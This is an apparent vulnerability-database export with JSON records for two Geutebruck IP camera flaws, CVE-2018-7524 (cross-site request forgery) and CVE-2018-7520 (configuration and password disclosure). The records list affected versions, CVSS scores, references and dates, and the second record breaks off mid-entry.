    VAR-201803-2216

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2216",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7524",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2018-7524",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06021",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-137556",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7524",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7524",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7524",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06021",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-763",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137556",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7524",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E8F6E1-39AB-11E9-AC0F-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "id": "VAR-201803-2216",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.656000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCameras cross-site request forgery vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122843"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for cross-site request forgery vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79349"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7524"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7524"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "date": "2018-03-22T18:29:01.027000",
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "date": "2024-11-21T04:12:17.723000",
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Cross-Site Request Forgery Vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2213

    Vulnerability from variot - Updated: 2024-11-23 21:53

    An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2213",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7520",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7520",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2018-7520",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06020",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
